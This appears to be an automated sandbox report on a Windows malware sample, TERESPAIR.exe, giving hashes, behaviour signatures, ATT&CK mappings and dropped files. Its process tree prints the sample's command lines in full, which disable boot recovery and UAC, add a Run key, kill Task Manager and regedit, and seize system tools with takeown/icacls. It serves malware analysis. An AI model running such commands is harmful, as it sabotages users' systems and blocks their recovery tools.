Analysis

  • max time kernel
    5s
  • max time network
    8s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    01-07-2024 02:21

General

  • Target

    TERESPAIR.exe

  • Size

    551KB

  • MD5

    0ffccbd12475d9082cf307ad70739bdc

  • SHA1

    3357a844ae038543844e622839167e7ff1360474

  • SHA256

    4c291a0e441b43a6d0bb77f5038ca736276e735196349abb6e9d4c7cc3fd4dc5

  • SHA512

    7d8893b8082faf6dee334959f602c5e81192982238ce5dfd52210f7db48c73fe5ad952860f845404b7c369e3be11d3c6bc0cab2cacab993632211a5e599559ee

  • SSDEEP

    12288:Scv0NTIx0stUF2jL2DBzvksvkyRQ72KGNxJLACRC/q9:ScvkTIxxUFT9TvkG7lJsCUy9

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Possible privilege escalation attempt 12 IoCs
  • Modifies file permissions 1 TTPs 12 IoCs
  • Modifies system executable filetype association 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Drops file in System32 directory 10 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe
    "C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4364
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5767.tmp\5768.tmp\5769.bat C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe"
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:1576
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2252
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Arrow /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
        3⤵
          PID:2116
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Hand /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
          3⤵
            PID:2740
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v AppStarting /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
            3⤵
              PID:4804
            • C:\Windows\system32\reg.exe
              reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Wait /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
              3⤵
                PID:3872
              • C:\Windows\system32\reg.exe
                reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\SKULL.ico" /f
                3⤵
                • Modifies system executable filetype association
                • Modifies registry class
                PID:2140
              • C:\Windows\system32\reg.exe
                reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\SKULL.ico" /f
                3⤵
                • Modifies registry class
                PID:3408
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                3⤵
                • UAC bypass
                PID:4780
              • C:\Windows\system32\reg.exe
                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v death.exe /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\death.exe" /f
                3⤵
                • Adds Run key to start application
                PID:1900
              • C:\Windows\system32\reg.exe
                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\bg.jpg" /f
                3⤵
                  PID:1864
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
                  3⤵
                    PID:4904
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im regedit.exe
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3456
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im taskmgr.exe
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2484
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im mmc.exe
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4632
                  • C:\Windows\system32\takeown.exe
                    takeown /f "C:\Windows\regedit.exe"
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2168
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\Windows\regedit.exe" /grant everyone:F
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:1120
                  • C:\Windows\system32\takeown.exe
                    takeown /f "C:\Windows\System32\taskmgr.exe"
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4028
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\Windows\System32\taskmgr.exe" /grant everyone:F
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:720
                  • C:\Windows\system32\takeown.exe
                    takeown /f "C:\Windows\System32\taskkill.exe"
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2988
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\Windows\System32\taskkill.exe" /grant everyone:F
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:3236
                  • C:\Windows\system32\takeown.exe
                    takeown /f "C:\Windows\System32\mmc.exe"
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2628
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\Windows\System32\mmc.exe" /grant everyone:F
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:1180
                  • C:\Windows\system32\takeown.exe
                    takeown /f "C:\Windows\System32\UserAccountControlSettings.exe"
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2408
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\Windows\System32\UserAccountControlSettings.exe" /grant everyone:F
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:4716
                  • C:\Windows\system32\takeown.exe
                    takeown /f "C:\Windows\System32\chkdsk.exe"
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2240
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\Windows\System32\chkdsk.exe" /grant everyone:F
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:2092
                  • C:\Windows\system32\shutdown.exe
                    shutdown /r /t 0
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2352
              • C:\Windows\system32\LogonUI.exe
                "LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d
                1⤵
                • Modifies data under HKEY_USERS
                • Suspicious use of SetWindowsHookEx
                PID:2884

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Persistence

              Event Triggered Execution

              1
              T1546

              Change Default File Association

              1
              T1546.001

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Privilege Escalation

              Abuse Elevation Control Mechanism

              1
              T1548

              Bypass User Account Control

              1
              T1548.002

              Event Triggered Execution

              1
              T1546

              Change Default File Association

              1
              T1546.001

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Defense Evasion

              Abuse Elevation Control Mechanism

              1
              T1548

              Bypass User Account Control

              1
              T1548.002

              Impair Defenses

              1
              T1562

              Disable or Modify Tools

              1
              T1562.001

              Modify Registry

              3
              T1112

              File and Directory Permissions Modification

              2
              T1222

              Windows File and Directory Permissions Modification

              1
              T1222.001

              Discovery

              System Information Discovery

              1
              T1082

              Impact

              Inhibit System Recovery

              1
              T1490

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\5767.tmp\5768.tmp\5769.bat
                Filesize

                2KB

                MD5

                8894013652db082fb9a4ce91bf40222f

                SHA1

                d79e5f5f4984ea0f2648b6155feecf3d786767e5

                SHA256

                c3914537fd001edc8d9d9d6497cbd942de5b478d391a00ca07f86af017c62359

                SHA512

                94c3587a6d141d8e1b7f3e1b49173e65b1c51f327f5e676ee7a072384ee0fec0ed4f56a67704dbf7ad254aa16ba75490da018a9591cb5326deb317a21ae604f9

              • C:\Users\Admin\AppData\Local\Temp\5767.tmp\popups.exe
                Filesize

                87KB

                MD5

                d7f63114aade341d8a3f6924cdfa182a

                SHA1

                ebf02b5fc29dde742321f2bc5bf80575907d7daf

                SHA256

                1e6d2f793b52c9099dea1c94bb97e1e4e10683ef588cf090a82781c67779ebeb

                SHA512

                763d369c0002b64436f74b89ffd1879f9390445713634b73e3fd3fe40ba57373efa86d0c102d79571b5f21f2ce972475517b716c7567b3fcb1fc225e94de51a5

              • C:\Users\Admin\Desktop\OPENME5.txt
                Filesize

                71B

                MD5

                4207e6b2edf7d32f4ffa65b257b84598

                SHA1

                44b173829cb9a85997ebc1e9184080534404b5ff

                SHA256

                4ded9a36558a18aaf67f9cddc11e60ad4f8f45230a50626fdb60de7ee1ff0f4c

                SHA512

                c4deaeb10de42d997b6fda00ff2266ee41ebb9b901043a9e6f106b166d6a2559acb9329a4ff4b611c4c6bf08662dd2461248118f5076ade34357f18973213954